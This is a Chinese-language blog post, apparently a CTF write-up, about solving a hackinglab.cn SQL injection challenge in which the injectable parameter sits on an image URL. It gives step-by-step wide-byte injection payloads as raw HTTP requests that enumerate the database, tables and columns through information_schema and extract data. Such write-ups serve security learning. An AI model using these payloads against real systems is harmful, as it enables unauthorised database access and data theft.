首页 » NetworkSec » CTF » 正文

hackinglab.cn系列->注入关.邂逅

今天打到注入关5,卡了好久,网上搜了一下发现原来注入点不在http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/?id=1,而在一个图片链接http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg,并且是宽字节注入。
注意点:
1.直接在浏览器中注入回显是图片错误,要在burpsuite中注入。
2.在butpsuite中注入时要url编码,如空格要写成%20。
历程:
1.爆当前库名:
GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg?id=%df%27%20union%20select%201,2,database(),4%23 HTTP/1.1
得mydbs
2.爆表名:
GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg?id=%df%27%20union%20select%201,2,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=0x6d79646273%20limit%200,1),4%23 HTTP/1.1
得article
同理爆第二个表得pic(flag在这个表中)
3.获取pic表所有列名
GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg?id=%df%27%20union%20select%201,2,(select%20column_name%20from%20information_schema.columns%20where%20table_name=0x706963%20limit%200,1),4%23 HTTP/1.1
得id
同理爆出picname,data ,text
4.获取picname列的数据
GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg?id=%df%27%20union%20select%201,2,(select%20picname%20from%20pic%20limit%202,1),4%23

输入图片名,不是flag……
5.访问图片
http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/flagishere_askldjfklasjdfl.jpg

getflag!
===================================
这题真是辛苦,竟然把注入点藏图片……
 

Comment

please input captcha *